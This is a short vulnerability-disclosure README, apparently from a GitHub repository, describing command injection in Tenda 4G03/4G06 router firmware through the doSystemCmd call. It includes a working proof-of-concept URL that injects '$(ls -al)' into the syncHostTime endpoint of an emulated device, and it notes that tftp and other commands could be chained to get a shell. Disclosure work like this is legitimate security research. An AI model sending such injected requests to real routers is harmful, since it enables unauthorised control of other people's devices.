manba-bryant/tenda_4g03-4g06_vuln/README.md

 # Vulnerability information
 ![image](https://github.com/user-attachments/assets/33559806-3b51-4215-96f5-0ccb4eee08cd)

 Pass the URL parameters to var, control var, and then execute the corresponding system function through doSystemCmd.

 ## after emulate successed
 run ./bin/httpd

 ![image](https://github.com/user-attachments/assets/7a584e9a-0ac2-4bf9-9d61-6ed739434c99)

 ## browser access
 http://192.168.1.140/goform/syncHostTime/js/libs/reasy-ui-1.0.3.js?time=$(ls%20-al)
-you can see it in the simulation termina
+you can see it in the simulation terminal
 ![image](https://github.com/user-attachments/assets/725fa838-9d72-4f69-a5a9-9c2b105b3754)

 After testing, not only can execute 'ls'.
 Can also execute 'echo', 'cat', 'tftp' and other commands that can be used to construct payloads to obtain shell commands